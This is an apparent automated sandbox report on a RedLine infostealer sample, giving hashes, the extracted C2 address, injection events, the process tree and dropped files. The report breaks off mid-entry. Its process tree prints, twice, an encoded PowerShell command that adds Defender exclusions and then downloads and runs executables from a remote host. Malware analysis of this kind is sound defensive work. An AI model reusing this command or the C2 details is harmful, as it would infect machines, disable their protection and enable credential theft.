redline | 7b70b9f9483656e7b8ce1981fefd6dfe77cfd0d89b0826eb2c1ebabbf7d23a18

Analysis

max time kernel
185s
max time network
187s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
26-11-2022 23:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Loader.exe
Size

32KB
MD5

1b0e1de4fc8c200d3ea4509b9937ff01
SHA1

2cd17bfc99d0675977ee0bbd0494ed2aaa96cb2a
SHA256

7b70b9f9483656e7b8ce1981fefd6dfe77cfd0d89b0826eb2c1ebabbf7d23a18
SHA512

59821ffa02b7876da06032e577dfea6cc6df133b19e2a9c2295e1f6011883e2c298f71b2a4c5f04ceca492a26a1e22bdf368f95747cf7fba0dc4e3916c8ef403
SSDEEP

384:9vXX8GJ98MXVej4FsObOM7o/qo9VhvyCtCWdCMT42Ud0fz5WA9Snh9ZpR5ZsHLEt:RXX8GT8MXBb7oCIpwl2vz5WASnhza5c

Score

10^/10

redline 1 infostealer

Malware Config

Extracted

Family

redline

Botnet

107.182.129.73:21733

Attributes

auth_value
3a5bb0917495b4312d052a0b8977d2bb

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1932-101-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/1932-106-0x000000000041ADAE-mapping.dmp	family_redline
behavioral1/memory/1932-107-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/1932-108-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 700 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

new2.exeSysApp.exeSmartDefRun.exenew2.exeSysApp.exeSmartDefRun.exe

pid process

524 new2.exe
1548 SysApp.exe
1712 SmartDefRun.exe
1564 new2.exe
1016 SysApp.exe
1720 SmartDefRun.exe

flow	pid	process
5	700	powershell.exe

pid	process
524	new2.exe
1548	SysApp.exe
1712	SmartDefRun.exe
1564	new2.exe
1016	SysApp.exe
1720	SmartDefRun.exe

Loads dropped DLL 10 IoCs

Processes:

powershell.exepowershell.exe

pid	process
700	powershell.exe
700	powershell.exe
700	powershell.exe
700	powershell.exe
700	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 3 IoCs

Processes:

C4Loader.exeC4Loader.exenew2.exe

description	pid	process	target process
PID 1828 set thread context of 1476	1828	C4Loader.exe	vbc.exe
PID 1748 set thread context of 996	1748	C4Loader.exe	vbc.exe
PID 524 set thread context of 1932	524	new2.exe	vbc.exe

Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

1420 1828 WerFault.exe C4Loader.exe
1812 1748 WerFault.exe C4Loader.exe

pid	pid_target	process	target process
1420	1828	WerFault.exe	C4Loader.exe
1812	1748	WerFault.exe	C4Loader.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

Processes:

powershell.exeSysApp.exepowershell.exe

pid	process
700	powershell.exe
700	powershell.exe
700	powershell.exe
700	powershell.exe
700	powershell.exe
1548	SysApp.exe
1548	SysApp.exe
1548	SysApp.exe
1548	SysApp.exe
1548	SysApp.exe
1572	powershell.exe
700	powershell.exe
700	powershell.exe
700	powershell.exe
700	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe
1572	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 700 powershell.exe
Token: SeDebugPrivilege 1572 powershell.exe

description	pid	process
Token: SeDebugPrivilege	700	powershell.exe
Token: SeDebugPrivilege	1572	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

C4Loader.exevbc.exepowershell.exeC4Loader.exevbc.exenew2.exepowershell.exe

description	pid	process	target process
PID 1828 wrote to memory of 1476	1828	C4Loader.exe	vbc.exe
PID 1828 wrote to memory of 1476	1828	C4Loader.exe	vbc.exe
PID 1828 wrote to memory of 1476	1828	C4Loader.exe	vbc.exe
PID 1828 wrote to memory of 1476	1828	C4Loader.exe	vbc.exe
PID 1828 wrote to memory of 1476	1828	C4Loader.exe	vbc.exe
PID 1828 wrote to memory of 1476	1828	C4Loader.exe	vbc.exe
PID 1828 wrote to memory of 1420	1828	C4Loader.exe	WerFault.exe
PID 1828 wrote to memory of 1420	1828	C4Loader.exe	WerFault.exe
PID 1828 wrote to memory of 1420	1828	C4Loader.exe	WerFault.exe
PID 1828 wrote to memory of 1420	1828	C4Loader.exe	WerFault.exe
PID 1476 wrote to memory of 700	1476	vbc.exe	powershell.exe
PID 1476 wrote to memory of 700	1476	vbc.exe	powershell.exe
PID 1476 wrote to memory of 700	1476	vbc.exe	powershell.exe
PID 1476 wrote to memory of 700	1476	vbc.exe	powershell.exe
PID 700 wrote to memory of 1748	700	powershell.exe	C4Loader.exe
PID 700 wrote to memory of 1748	700	powershell.exe	C4Loader.exe
PID 700 wrote to memory of 1748	700	powershell.exe	C4Loader.exe
PID 700 wrote to memory of 1748	700	powershell.exe	C4Loader.exe
PID 700 wrote to memory of 524	700	powershell.exe	new2.exe
PID 700 wrote to memory of 524	700	powershell.exe	new2.exe
PID 700 wrote to memory of 524	700	powershell.exe	new2.exe
PID 700 wrote to memory of 524	700	powershell.exe	new2.exe
PID 700 wrote to memory of 1548	700	powershell.exe	SysApp.exe
PID 700 wrote to memory of 1548	700	powershell.exe	SysApp.exe
PID 700 wrote to memory of 1548	700	powershell.exe	SysApp.exe
PID 700 wrote to memory of 1548	700	powershell.exe	SysApp.exe
PID 1748 wrote to memory of 996	1748	C4Loader.exe	vbc.exe
PID 1748 wrote to memory of 996	1748	C4Loader.exe	vbc.exe
PID 1748 wrote to memory of 996	1748	C4Loader.exe	vbc.exe
PID 1748 wrote to memory of 996	1748	C4Loader.exe	vbc.exe
PID 1748 wrote to memory of 996	1748	C4Loader.exe	vbc.exe
PID 1748 wrote to memory of 996	1748	C4Loader.exe	vbc.exe
PID 1748 wrote to memory of 1812	1748	C4Loader.exe	WerFault.exe
PID 1748 wrote to memory of 1812	1748	C4Loader.exe	WerFault.exe
PID 1748 wrote to memory of 1812	1748	C4Loader.exe	WerFault.exe
PID 1748 wrote to memory of 1812	1748	C4Loader.exe	WerFault.exe
PID 996 wrote to memory of 1572	996	vbc.exe	powershell.exe
PID 996 wrote to memory of 1572	996	vbc.exe	powershell.exe
PID 996 wrote to memory of 1572	996	vbc.exe	powershell.exe
PID 996 wrote to memory of 1572	996	vbc.exe	powershell.exe
PID 524 wrote to memory of 1932	524	new2.exe	vbc.exe
PID 524 wrote to memory of 1932	524	new2.exe	vbc.exe
PID 524 wrote to memory of 1932	524	new2.exe	vbc.exe
PID 524 wrote to memory of 1932	524	new2.exe	vbc.exe
PID 524 wrote to memory of 1932	524	new2.exe	vbc.exe
PID 524 wrote to memory of 1932	524	new2.exe	vbc.exe
PID 700 wrote to memory of 1712	700	powershell.exe	SmartDefRun.exe
PID 700 wrote to memory of 1712	700	powershell.exe	SmartDefRun.exe
PID 700 wrote to memory of 1712	700	powershell.exe	SmartDefRun.exe
PID 700 wrote to memory of 1712	700	powershell.exe	SmartDefRun.exe
PID 1572 wrote to memory of 1552	1572	powershell.exe	C4Loader.exe
PID 1572 wrote to memory of 1552	1572	powershell.exe	C4Loader.exe
PID 1572 wrote to memory of 1552	1572	powershell.exe	C4Loader.exe
PID 1572 wrote to memory of 1552	1572	powershell.exe	C4Loader.exe
PID 1572 wrote to memory of 1564	1572	powershell.exe	new2.exe
PID 1572 wrote to memory of 1564	1572	powershell.exe	new2.exe
PID 1572 wrote to memory of 1564	1572	powershell.exe	new2.exe
PID 1572 wrote to memory of 1564	1572	powershell.exe	new2.exe
PID 1572 wrote to memory of 1016	1572	powershell.exe	SysApp.exe
PID 1572 wrote to memory of 1016	1572	powershell.exe	SysApp.exe
PID 1572 wrote to memory of 1016	1572	powershell.exe	SysApp.exe
PID 1572 wrote to memory of 1016	1572	powershell.exe	SysApp.exe
PID 1572 wrote to memory of 1720	1572	powershell.exe	SmartDefRun.exe
PID 1572 wrote to memory of 1720	1572	powershell.exe	SmartDefRun.exe

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:700

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
4⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:996

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
7⤵
PID:1552

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
7⤵
- Executes dropped EXE
PID:1564

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
7⤵
- Executes dropped EXE
PID:1016

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
7⤵
- Executes dropped EXE
PID:1720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 36
5⤵
- Program crash
PID:1812

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
5⤵
PID:1932

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1548

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
4⤵
- Executes dropped EXE
PID:1712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 36
2⤵
- Program crash
PID:1420

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Persistence

Privilege Escalation

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
896KB

MD5
3675ce52449818211862720b62c60060

SHA1
29380c2e08d10ad9545c33e26d9152e6dd771c56

SHA256
ecce265d017eea94163b8a2658f5c297a35d5497fc123a03c38eb291ea6717b4

SHA512
a22fd9e50cca577fa5847ccee5a5bd410125cd7df159261dd9f49426fa4a7b9c248c4b3fda6df5711846331aa5e138f2ecf0f1bf290b75d1fe23e3e32b0ed9ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
590KB

MD5
d83c68b004860f9df81e16471daef592

SHA1
b0f94bcaa4c806b9a35d7b8762c0ec5abf25ae9c

SHA256
fbc2c0e4cd92c2baf24a96418c5598cc62bf11171e1bb7c423332c3f6782f37b

SHA512
a716c0d6069b40b5e829a2555fa7b834ceb06de52837ab512ef2915b4a9bfe225a0e10c40a2f44fac636b15a42b87c701c0ad4a81ea840d09e3e7b4ceadaf084

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
590KB

MD5
d83c68b004860f9df81e16471daef592

SHA1
b0f94bcaa4c806b9a35d7b8762c0ec5abf25ae9c

SHA256
fbc2c0e4cd92c2baf24a96418c5598cc62bf11171e1bb7c423332c3f6782f37b

SHA512
a716c0d6069b40b5e829a2555fa7b834ceb06de52837ab512ef2915b4a9bfe225a0e10c40a2f44fac636b15a42b87c701c0ad4a81ea840d09e3e7b4ceadaf084

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
590KB

MD5
d83c68b004860f9df81e16471daef592

SHA1
b0f94bcaa4c806b9a35d7b8762c0ec5abf25ae9c

SHA256
fbc2c0e4cd92c2baf24a96418c5598cc62bf11171e1bb7c423332c3f6782f37b

SHA512
a716c0d6069b40b5e829a2555fa7b834ceb06de52837ab512ef2915b4a9bfe225a0e10c40a2f44fac636b15a42b87c701c0ad4a81ea840d09e3e7b4ceadaf084

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
ad6c82a3186f9a455bde0322b9a189da

SHA1
9c377fcb4ea697ffa6c2f282880830ac15070584

SHA256
0270bf781b501cd292aa79bbe606c10e79ab61535964b5156cca59296ae48f6e

SHA512
3f8ade9091e55b6882d29e001a0db1fc96e809f480892b616859f8609834e748615ae649b4a598d6c7c6e315bd5ba77581913a4d0ff702e5b2bf203b368822ef

Download Submit
\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
